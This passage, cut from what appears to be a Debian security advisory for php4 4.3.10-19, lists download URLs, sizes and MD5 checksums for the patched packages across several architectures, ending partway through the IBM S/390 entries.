http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_alpha.deb Size/MD5 checksum: 168220 6595a46953cfa5156cc9dfbebfb57238 http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_alpha.deb Size/MD5 checksum: 18148 9944bd006a811a68280d58707dba0fca http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_alpha.deb Size/MD5 checksum: 325162 3bf569109326bf57a6db0908864d7d4f http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_alpha.deb Size/MD5 checksum: 39036 0c174134c0af3da2a44471e0b6a0c0d9 http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_alpha.deb Size/MD5 checksum: 34546 12b9ead7e3d2bc3d586db7c639b25a71 http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_alpha.deb Size/MD5 checksum: 38140 f600d5a57454eac81a59614e396d0a7e http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_alpha.deb Size/MD5 checksum: 21370 4bc085128a86ebe0b5aff3f33c6b85a5 http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_alpha.deb Size/MD5 checksum: 18206 00041519f22ba5528a61384a1cd8ff25 http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_alpha.deb Size/MD5 checksum: 8340 5faa2f4f4dcc1e6d691fb4e514be1206 http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_alpha.deb Size/MD5 checksum: 22454 8b815228a909700fecf5bc08301605b6 http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_alpha.deb Size/MD5 checksum: 28368 230200935d5b2fe06fc6d01abcf36dc6 http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_alpha.deb Size/MD5 checksum: 7964 a6b4bbd2b60752668b3556cdcbafbf78 http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_alpha.deb Size/MD5 checksum: 13770 76441138f5d1bed6c02f43c5a2c55f0c http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_alpha.deb Size/MD5 checksum: 23304 d7802126ab8dde4842a72fca318e0424 
http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_alpha.deb Size/MD5 checksum: 17886 f341be585bc1342cc87cf814283dc826 AMD64 architecture: http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_amd64.deb Size/MD5 checksum: 1660864 6e8eea11106fd4b06d5d52ab41671003 http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_amd64.deb Size/MD5 checksum: 1658212 e874bb3b60124b4e32732e9b3988c47a http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_amd64.deb Size/MD5 checksum: 3278508 aac0f56842fe12b91dc7acab71f1be03 http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_amd64.deb Size/MD5 checksum: 1648682 51d7e77dba0ed241fa4bd60f110bcc69 http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_amd64.deb Size/MD5 checksum: 168202 11bf04caba233142536151ff0decf329 http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_amd64.deb Size/MD5 checksum: 17830 6079814a18fab1b42068de9fd1d35a29 http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_amd64.deb Size/MD5 checksum: 325184 9c48363c84aa56f9020d83cef98d8b75 http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_amd64.deb Size/MD5 checksum: 40800 d7ac88bc6c813a747c8ae14681605b35 http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_amd64.deb Size/MD5 checksum: 34280 3b1eb57caa289d1c776f66d6734dee39 http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_amd64.deb Size/MD5 checksum: 37726 014109aa721508ef8b6825e5e9744fac http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_amd64.deb Size/MD5 checksum: 21416 6b2bf18f6d6db5ee5bf57199639e9870 http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_amd64.deb Size/MD5 checksum: 18886 01b618565ddfce919b8fffba1b336fad http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_amd64.deb Size/MD5 checksum: 8248 
8e56bda6cd19f62248eba36057f9c381 http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_amd64.deb Size/MD5 checksum: 22892 6789a85586205f00dd35f396012d437f http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_amd64.deb Size/MD5 checksum: 28786 87c5652813f3fc2e636d0de7c6504585 http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_amd64.deb Size/MD5 checksum: 7918 c672b5d5a0dcc8ec56ae29b866909ee7 http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_amd64.deb Size/MD5 checksum: 13684 7996ac194aad7b71aca2ce125f3fe53a http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_amd64.deb Size/MD5 checksum: 22444 fba5d84d8727dc342a4613cb4f0e5fca http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_amd64.deb Size/MD5 checksum: 17576 182a9c583741056b4f903071066aa777 ARM architecture: http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_arm.deb Size/MD5 checksum: 1592392 e6c3e603f4b01b8b6472a01fa5c8b149 http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_arm.deb Size/MD5 checksum: 1591960 42fc42a21fafe9980b1cbbd1450b6ebe http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_arm.deb Size/MD5 checksum: 3172326 44e7b476a2e1f1d6a8a3515aa407dddb http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_arm.deb Size/MD5 checksum: 1593200 0b02299dad2f9a76ee4e11f2d1aba8f1 http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_arm.deb Size/MD5 checksum: 168244 f3c5d8aa86020ded4056f329cb005fe4 http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_arm.deb Size/MD5 checksum: 17652 459d0f476feee2720542be633d56a92b http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_arm.deb Size/MD5 checksum: 325472 a741698e463184d3b278412189c9c1c2 http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_arm.deb Size/MD5 checksum: 36114 
5de247081d931105d8dfcad25dead156 http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_arm.deb Size/MD5 checksum: 31782 8581635d5ffcb20066ad8a17742bf27e http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_arm.deb Size/MD5 checksum: 35462 da35a74bd0d0db3f7488860e19cfa79d http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_arm.deb Size/MD5 checksum: 19736 9be69fb529fcf733a91ac24b024a9958 http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_arm.deb Size/MD5 checksum: 17086 5e372f2c55c6db64733458342fd27952 http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_arm.deb Size/MD5 checksum: 7826 6b2e87408132edfc496475409128f949 http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_arm.deb Size/MD5 checksum: 20600 cfad055dec9f682724478910247d974e http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_arm.deb Size/MD5 checksum: 27330 5c1904d04e7f81349b2d78e1cb7abe3b http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_arm.deb Size/MD5 checksum: 7644 d6ce09f4c247eb1a69965bc90836df81 http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_arm.deb Size/MD5 checksum: 12790 31d406e601ca65bfc8a2779d0e7cebb4 http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_arm.deb Size/MD5 checksum: 20892 822c073cb45186c6d872afdef513bc90 http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_arm.deb Size/MD5 checksum: 15792 169a0517a14c792e870fcf1b94192276 HP Precision architecture: http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_hppa.deb Size/MD5 checksum: 1759810 d97fae3b1a080a942653878c82cd3ffa http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_hppa.deb Size/MD5 checksum: 1757570 5c77a078ff8b20ea0402b4a904e0232b http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_hppa.deb Size/MD5 checksum: 3427812 
03e08da005f5f97a6ecd7ab60b5ce68c http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_hppa.deb Size/MD5 checksum: 1719506 0d0b5c78f2493fa4911db750d517998a http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_hppa.deb Size/MD5 checksum: 168222 7370b1318dc8c75d7008c255b2002f6a http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_hppa.deb Size/MD5 checksum: 20028 45464c08d59854305c4a5c9f490d9a63 http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_hppa.deb Size/MD5 checksum: 325312 ecccda98a727a5eaf06a0f0b17185cce http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_hppa.deb Size/MD5 checksum: 42104 40d2342dcc42b48485573952cffc03f7 http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_hppa.deb Size/MD5 checksum: 37340 88ff9b02b36a7a1c9c2fce8056ef6f15 http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_hppa.deb Size/MD5 checksum: 42648 8f1169758d56f94f0c92142be87d6be0 http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_hppa.deb Size/MD5 checksum: 23000 12fa26227ed747fa3af3ad9efeb8d504 http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_hppa.deb Size/MD5 checksum: 19908 560ad81c6f6db1820c6c572f67cd8152 http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_hppa.deb Size/MD5 checksum: 8698 0656ad921535945f456fb480cc80743f http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_hppa.deb Size/MD5 checksum: 23596 2fae2e9262934c47965416824c08943b http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_hppa.deb Size/MD5 checksum: 30172 d2aaabd18fe095a8e106e20505f03ef2 http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_hppa.deb Size/MD5 checksum: 8340 5f2d0de885c904fec8a775afc40b6334 http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_hppa.deb Size/MD5 checksum: 14562 e5dd41449a0e1b35188c7b1946610862 
http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_hppa.deb Size/MD5 checksum: 24124 786abb1633ebf48ab459f4e96656efba http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_hppa.deb Size/MD5 checksum: 18650 afab0398769e8c50b934ee221ea50a5a Intel IA-32 architecture: http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_i386.deb Size/MD5 checksum: 1614182 612dd25787db4bba5c0b54006c02d50b http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_i386.deb Size/MD5 checksum: 1612058 9a67d7f1a9aade4bb3eed6b392077bf9 http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_i386.deb Size/MD5 checksum: 3209228 5ac98a8a5649ea2ae6588c4e460ec90c http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_i386.deb Size/MD5 checksum: 1609646 ec3d17f2b3024ef5ed6e8b21c4286b26 http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_i386.deb Size/MD5 checksum: 168222 9ab456c6fe0ed13f2e591f88a26f81d6 http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_i386.deb Size/MD5 checksum: 17892 92d2e8793dfca9be7576624beb4b0005 http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_i386.deb Size/MD5 checksum: 325192 1a382f30b8ece263b027cfcc35ecfe9c http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_i386.deb Size/MD5 checksum: 37228 317fd23c3687d861b8b4789c1ea381d1 http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_i386.deb Size/MD5 checksum: 32384 d0655edb839dae2fa8ce269c84e91500 http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_i386.deb Size/MD5 checksum: 37402 95a94b237e75a4c1a64bcb592b351498 http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_i386.deb Size/MD5 checksum: 19958 9cd9bd8707c8b781e9196311f031ec02 http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_i386.deb Size/MD5 checksum: 17672 
4b6d7c1eca69b9b218617ac243fa08ad http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_i386.deb Size/MD5 checksum: 8036 d2efa8096dc22d3c83f8095bb1ab4041 http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_i386.deb Size/MD5 checksum: 21218 042bca1661b147c7be77a69936793904 http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_i386.deb Size/MD5 checksum: 27138 7bbf0a0bd2aee657573d7174f32f1ae7 http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_i386.deb Size/MD5 checksum: 7704 449baf33502b9f48c083dc4b338979dd http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_i386.deb Size/MD5 checksum: 13152 e1843d982173596abed784d8e7afcafa http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_i386.deb Size/MD5 checksum: 21382 629931e8d3024d1905071ec9dca9142b http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_i386.deb Size/MD5 checksum: 16400 d58ba81b22439e5285d448c4316bf5f0 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_ia64.deb Size/MD5 checksum: 1952256 b11fa1724bd55829b353525d564e47cc http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_ia64.deb Size/MD5 checksum: 1949710 aa0d4ee3995c997f265c272bc0445e1d http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_ia64.deb Size/MD5 checksum: 3895870 c29d60863e2331e919339626831fb5a4 http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_ia64.deb Size/MD5 checksum: 1950132 2a7611e476d2afd7f5564e7f4cafac3a http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_ia64.deb Size/MD5 checksum: 168224 f3c570f637fb69b0d55dbdaaaf882c53 http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_ia64.deb Size/MD5 checksum: 22028 f51f4140ef5d8de1db90bfe06d92d8b8 http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_ia64.deb Size/MD5 checksum: 
325338 41a5b1ff824be8410e94d5d3f4eaab5c http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_ia64.deb Size/MD5 checksum: 50644 a1f0f2f91dfbf84d24446e455e4d0d7c http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_ia64.deb Size/MD5 checksum: 45256 45155a527b60ebcd117901fc86390d67 http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_ia64.deb Size/MD5 checksum: 48280 cea938e0b3829eeb344939c6116a3274 http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_ia64.deb Size/MD5 checksum: 27042 fc2b4d3e1ae91076548568d8c922037f http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_ia64.deb Size/MD5 checksum: 22658 f0f5301aa72e4e4ad61bdf90e6594de2 http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_ia64.deb Size/MD5 checksum: 9334 a5c9f81e2bd6bc5ee4c86f5e4d1a0cd1 http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_ia64.deb Size/MD5 checksum: 27602 89ecb1e38d742cff328580cdfe78b8f1 http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_ia64.deb Size/MD5 checksum: 36192 49054c542a4534c12894bfefaf0db1eb http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_ia64.deb Size/MD5 checksum: 9012 d4db9ef8429729ab3051501004082c99 http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_ia64.deb Size/MD5 checksum: 16338 d614825738a19af8ad2500b7c048b51b http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_ia64.deb Size/MD5 checksum: 28878 6d5df675a23f641f3e1dc5656db9e18a http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_ia64.deb Size/MD5 checksum: 21912 e76f15111a9b4ccdd94e1f7eac74b088 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_m68k.deb Size/MD5 checksum: 1580014 f45532aa9784f98ff1525bb005c76b30 http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_m68k.deb Size/MD5 
checksum: 1578768 71e652061d4867e6520d448b695f59f7 http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_m68k.deb Size/MD5 checksum: 3080886 6131fe6ae47c2585775714cc64f2b34e http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_m68k.deb Size/MD5 checksum: 1551076 4aef3676854e4ace8e79d0b740109acd http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_m68k.deb Size/MD5 checksum: 168268 46923171263033b7d10a73c165baa849 http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_m68k.deb Size/MD5 checksum: 18322 38c451535b6cd68a0e685c4df93cb01e http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_m68k.deb Size/MD5 checksum: 325808 dd492a00a1d27fa02f2b60e6a481d753 http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_m68k.deb Size/MD5 checksum: 36516 d96b45bb5edaf8edd2282180639ddde8 http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_m68k.deb Size/MD5 checksum: 31006 5647045aff47fb945f5ad2f148e4aede http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_m68k.deb Size/MD5 checksum: 34926 a7fecf002a308ed790931ecc849f379c http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_m68k.deb Size/MD5 checksum: 19126 8cd11ec89d611be7674b5117bd48545a http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_m68k.deb Size/MD5 checksum: 17820 d4e6de681e37bae511f04d4a3aa5bb2f http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_m68k.deb Size/MD5 checksum: 7964 06ac2494cd27c91d06f40592bdde7871 http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_m68k.deb Size/MD5 checksum: 20694 b290e22f889af582bedf953d3b5e63a2 http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_m68k.deb Size/MD5 checksum: 25852 be18d00b30fbca8ee6f6d9f31c9912b4 http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_m68k.deb Size/MD5 checksum: 7682 
7fd30edd98afff26bb2d0fedc5556ac8 http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_m68k.deb Size/MD5 checksum: 12708 f95ada3a476fda3ea9bb36a263dfc19e http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_m68k.deb Size/MD5 checksum: 20376 6a0f683bd56800a86976d17cf0f90438 http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_m68k.deb Size/MD5 checksum: 15878 4d8a9a99d92b68a7c29f9e4eb48e6c28 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_mips.deb Size/MD5 checksum: 1648626 c09ff318909ac3ec198cf8adb32c3e73 http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_mips.deb Size/MD5 checksum: 1646678 8adf0e0321dad42a4a33278b54c1d78a http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_mips.deb Size/MD5 checksum: 3295802 61b55383a87aaecf5825679502a2cd94 http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_mips.deb Size/MD5 checksum: 1652658 c094e3ff43dca52eecd39d3d393003f9 http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_mips.deb Size/MD5 checksum: 168214 a85518eecd34caeb8b155741fbba6db2 http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_mips.deb Size/MD5 checksum: 16826 79bb3b43b38eba4b9cfaed68939fb1ad http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_mips.deb Size/MD5 checksum: 325308 eab0cd699328a69b4f3ef88481985d6c http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_mips.deb Size/MD5 checksum: 35228 de389e3122cd99882eeeaca2fc7b70a3 http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_mips.deb Size/MD5 checksum: 31938 87dea075793ed76b812a81963c913aef http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_mips.deb Size/MD5 checksum: 34012 e535078c682091dac1a46f2fb4c0e7c4 http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_mips.deb Size/MD5 checksum: 
19922 5fe0bc6ac5386626273ae6ee2e66215b http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_mips.deb Size/MD5 checksum: 16476 372a59ba3934e84bb106896a06a03a11 http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_mips.deb Size/MD5 checksum: 8120 2b6f78e9419969fdc3ce80bc14d85560 http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_mips.deb Size/MD5 checksum: 20504 0ce56458633d1e77f528d4f9b968ce13 http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_mips.deb Size/MD5 checksum: 26370 3b393309a1ddb3a67a6018496ca29e6b http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_mips.deb Size/MD5 checksum: 7824 fa7930366a56bb94deaffe6440e94822 http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_mips.deb Size/MD5 checksum: 13154 243bf42c3fdd1db4f402de11750c9171 http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_mips.deb Size/MD5 checksum: 21654 cd359bf978b6ea51e6eb65a37b60278f http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_mips.deb Size/MD5 checksum: 16188 d4ebc66b677efe3b82a163b62c29aa35 Little endian MIPS architecture: http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_mipsel.deb Size/MD5 checksum: 1630640 210a7f2df10febfaa52f2447520df140 http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_mipsel.deb Size/MD5 checksum: 1628878 17b584a9e468eb8ede205a2a6878f4b1 http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_mipsel.deb Size/MD5 checksum: 3254494 b9a460244d857a77f0d2fc5c1b91894f http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_mipsel.deb Size/MD5 checksum: 1631616 370c7e8cb963ec8f95049dbf5675fe4a http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_mipsel.deb Size/MD5 checksum: 168228 ff3e221bfb5b79f12c10ebd815d88b29 
http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_mipsel.deb Size/MD5 checksum: 16794 7d960cc9d3e3d362d0f4dba0497eb5b7 http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_mipsel.deb Size/MD5 checksum: 325308 f14f5986aa26436d2c6d81707b9987d8 http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_mipsel.deb Size/MD5 checksum: 34774 f4f195f0914c0bc882b5143c479c5d24 http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_mipsel.deb Size/MD5 checksum: 31666 9f6063fcb54d5379b997ccbc982f65f2 http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_mipsel.deb Size/MD5 checksum: 33894 da46922024a02d1023b521cc076cb9cb http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_mipsel.deb Size/MD5 checksum: 19800 b86f23fe9c0c7ec4b56c2f767693835f http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_mipsel.deb Size/MD5 checksum: 16384 3e98c62e74e0523e224ad665e604eb78 http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_mipsel.deb Size/MD5 checksum: 8092 2ab07f4176f45cbd6a74fbccdb72e9b9 http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_mipsel.deb Size/MD5 checksum: 20448 61b72f3ff7cbdec0c7bcf644ae7a42e4 http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_mipsel.deb Size/MD5 checksum: 26244 d38dfaa8d7a2565b38edf485c9692212 http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_mipsel.deb Size/MD5 checksum: 7778 0aba913f072a2ab411f7f36408838041 http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_mipsel.deb Size/MD5 checksum: 13054 2b4f2d929c4a9e8d7aafc439b6a6b4b4 http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_mipsel.deb Size/MD5 checksum: 21598 6691aed3e3879ce3884c31bc0c60ae4f http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_mipsel.deb Size/MD5 checksum: 16166 696aa9954b611596fa02b92bb15914d3 PowerPC architecture: 
http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_powerpc.deb Size/MD5 checksum: 1661280 abad22f7719712b40a4af68503551e21 http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_powerpc.deb Size/MD5 checksum: 1659466 4997003d5edddb161c931ed7f47cfe0a http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_powerpc.deb Size/MD5 checksum: 3281422 f4bdbbaac2e032788c26bb92dc0da376 http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_powerpc.deb Size/MD5 checksum: 1646784 d84ff6b16873412f6af326995e09ab54 http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_powerpc.deb Size/MD5 checksum: 168220 3f03b4edeffcd89c5cc4127d3a4602ac http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_powerpc.deb Size/MD5 checksum: 19638 1c874990ecb283c1b23950b016485b50 http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_powerpc.deb Size/MD5 checksum: 325264 15b8a3d2cde40c4aaf31d1925189ab3b http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_powerpc.deb Size/MD5 checksum: 38646 3945c96a6cd13120e293f60ae820d6d0 http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_powerpc.deb Size/MD5 checksum: 34516 b44d4867447c01db49fe5a9c8e538015 http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_powerpc.deb Size/MD5 checksum: 37770 8fffcc151a281269cccb29559f0b90fc http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_powerpc.deb Size/MD5 checksum: 21412 9a9663537ca1997bc62cfa4494eba8f3 http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_powerpc.deb Size/MD5 checksum: 19728 9bb25b04bec25cee082c8a8e81c4a19d http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_powerpc.deb Size/MD5 checksum: 9578 d1bd238a89be2838f5b37d5b2b2a9053 http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_powerpc.deb Size/MD5 checksum: 22604 
2935a012ecd74195f44e2213c9999c7a http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_powerpc.deb Size/MD5 checksum: 28686 46bb5b9d2b6e4258fe2b8dc130ae817c http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_powerpc.deb Size/MD5 checksum: 9286 2282aefc94808ac2ea1490ecb3ea357f http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_powerpc.deb Size/MD5 checksum: 14960 68716f24414748d9e621c7f4b0a8e2ea http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_powerpc.deb Size/MD5 checksum: 23038 193ae7cc97bc2ce1c7033cc14cd6c9c9 http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_powerpc.deb Size/MD5 checksum: 18268 1b032bee509fb88ce36d481c4335418a IBM S/390 architecture: http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_s390.deb 